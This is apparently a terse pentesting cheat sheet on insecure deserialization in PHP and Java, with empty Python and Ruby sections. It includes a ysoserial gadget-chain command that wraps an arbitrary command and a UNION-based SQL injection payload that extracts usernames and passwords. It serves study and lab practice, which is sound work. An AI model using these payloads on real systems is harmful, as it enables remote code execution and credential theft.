Insecure Deserialization
** base64 encoding with delimiters \00 can also be used?
PHP
O:<char-length>:"<classname>":n:{s:n:"s":s:n:"s";s:n:"s":b:1} - methods serialize() unserialize() 0 == "passwordAbcd" 'True' Checks only the first character as integer. If no integer, 0 is considered the value. 9 == "a9sbv6bk2d9naeeoch2yffy2fp6zfz13" 'false' - Anatomy of a serialize()'ed value:
- Magic methods __construct __destruct __sleep (during serialization) __wakeup (during deserialization) - Gadget chain for Apache Commons java -jar ysoserial.jar CommonsCollections2 '<command>' | base64 | tr -d "\n" - Check stack trace for php framework versions {"token":"=","sig_hmac_sha1":""}
Java
starts with rO0 when object/string is converted to Base64 - class and methods java.io.Serializable writeObject() readObject() - Magic methods ObjectInputStream.readObject() - Universal Detection in any java version URLDNS chain triggers a DNS lookup - if the target JRE is not patched with JEP290 exploitation of RMI Registries - JRMPClient and JRMPListener - The transient keyword in Java is used to avoid serialization. If any object of a data structure is defined as a transient , then it will not be serialized. - The package name of the gadget class is present in the binary serialized object. - Postgresql Injection SELECT * FROM products WHERE id = '%s' LIMIT 1", id java PortswiggerGenericSD "' UNION SELECT '1','2','3',CAST((SELECT concat(username,':',password) from users LIMIT 1) as int),'5','6','7','8' --"
Python
Ruby
Last updated
Was this helpful?